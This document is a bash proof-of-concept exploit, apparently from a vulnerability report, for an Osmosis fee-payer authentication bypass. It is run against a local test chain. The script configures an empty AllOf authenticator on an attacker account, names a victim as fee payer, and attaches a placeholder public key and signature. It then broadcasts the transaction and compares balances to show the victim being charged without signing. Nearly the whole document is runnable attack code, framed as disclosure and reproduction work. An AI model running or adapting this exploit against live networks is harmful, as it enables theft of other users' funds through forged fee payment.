
Proof of concept for bypassing fee-payer authentication

#!/bin/bash
# Proof of concept run against a local Osmosis chain (chain-id "localosmosis",
# test keyring). It builds a transaction whose fee payer is a different
# account ("victim") than the signer ("hacker_auth"), attaches a placeholder
# signer_info/signature for the fee payer, and broadcasts it. The balances
# printed before and after show whether the fee was deducted from the victim
# without a valid signature from that account.
#
# Expected secure behaviour (the thing the ante handler must enforce): the fee
# payer is a signer of the transaction, so its signature must be verified
# against that account's own authenticators/public key before any fee is
# deducted; a signer_info with an unverified placeholder key must be rejected.
#
# Usage:  ./poc.sh setup   # one-time: configure the hacker_auth authenticators
#         ./poc.sh         # run the fee-payer test transaction

BINARY="osmosisd"
# NOTE(review): "~" inside double quotes is not expanded by bash, so the
# literal string "~/.osmosisd-local" is what reaches --home below. This only
# works if the binary expands "~" itself — confirm, or use "$HOME/.osmosisd-local".
CHAIN_HOME="~/.osmosisd-local"
# Flags shared by every tx subcommand; the query commands below pass --home on their own.
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"

# Bech32 addresses of the two keyring entries the PoC relies on.
HACKER_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker_auth`
VICTIM_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a victim`

# set up the hacker_auth account to have the AllOfAuthenticator with no SubAuthenticators, so everything is valid
# Steps: (1) register a SignatureVerificationAuthenticator for the fixed pubkey
# below, (2) register an AllOfAuthenticator with an empty sub-authenticator
# list, (3) remove authenticator id 0 — presumably the one added in step (1),
# leaving only the empty AllOf (confirm ids against the chain's numbering).
if [ "$1" == "setup" ]; then
  $BINARY $TX_FLAGS tx authenticator add-authenticator SignatureVerificationAuthenticator "Ao3uARK8EwlXQ6r0X6z+xjmDSZ2WV2fn0Q1F5E3ZBJy+" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes
  $BINARY $TX_FLAGS tx authenticator add-authenticator AllOfAuthenticator "[]" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes

  # Unsigned MsgRemoveAuthenticator (id 0) from the hacker; fee paid by the hacker (payer empty).
  cat << EOF > msgs.json
  {"body":{"messages":[{
    "@type":"/osmosis.authenticator.MsgRemoveAuthenticator",
    "sender":"$HACKER_ADDR","id":0}],
  "memo":"","timeout_height":"0","extension_options":[],
  "non_critical_extension_options":[]},"auth_info":{"signer_infos":[],
  "fee":{"amount":[{"denom":"uosmo","amount":"875"}],
  "gas_limit":"350000","payer":"","granter":""}},"signatures":[]}
EOF

  # NOTE(review): 2>&1 feeds stderr into jq as well, so any warning printed by
  # the binary corrupts signed.json; keep stderr separate when reproducing.
  $BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR 2>&1 | jq > signed.json
  $BINARY $TX_FLAGS tx broadcast signed.json --output json --broadcast-mode block
fi

# Unsigned test transaction: the message is sent by the hacker, but
# auth_info.fee.payer names the victim, so the victim must also be a signer.
# Fee 1000000uosmo / gas 25000000 is deliberately large so the deduction is visible.
cat << EOF > msgs.json
{
  "body": {
    "messages": [
      {
        "@type": "/osmosis.valsetpref.v1beta1.MsgWithdrawDelegationRewards",
        "delegator":"$HACKER_ADDR"
      }
    ],
    "memo": "",
    "timeout_height": "0",
    "extension_options": [],
    "non_critical_extension_options":[]
  },
  "auth_info": {
    "signer_infos": [],
    "fee": {
      "amount": [
        {
          "denom": "uosmo",
          "amount": "1000000"
        }
      ],
      "gas_limit": "25000000",
      "payer": "$VICTIM_ADDR",
      "granter": ""
    }
  },
  "signatures": []
}
EOF

# sign the payload from the hacker
# Only the hacker's key signs (amino-json sign mode); no victim signature is ever produced.
# NOTE(review): same 2>&1-into-jq issue as in the setup branch.
$BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR --sign-mode amino-json 2>&1 | jq > signed.json

# add fake signature and signer info
# A second signer_info (index 1) with placeholder pubkey "AAAA", sequence 0 and
# legacy amino-json mode is appended for the fee payer, together with a
# placeholder signature "AAAA". Neither value can verify against the victim's
# real key; a correct ante handler rejects the tx at this point.
cat signed.json | \
  jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
  "sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
  jq '.signatures[1] |= .+ "AAAA"' > signed2.json

# Snapshot uosmo balances so the fee deduction can be attributed after broadcast.
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances before:"
echo "hacker ($HACKER_ADDR): $HACKER_BALANCE"
echo "victim ($VICTIM_ADDR): $VICTIM_BALANCE"

# Broadcast the tampered tx; full JSON response (including events) saved to output.json.
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > output.json

# Decode the base64 event attribute keys/values and print the third event.
# (Which event lands at index 2 is not fixed by this script — inspect output.json if it is not the one expected.)
cat output.json | jq '.events[].attributes[] |= {key: (.key | @base64d),value: (.value | @base64d),index: .index}' | jq '.events[2]'

# If the victim's balance dropped while the hacker's did not, the fee was
# taken from an account that never validly signed — the bypass reproduced.
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances after:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"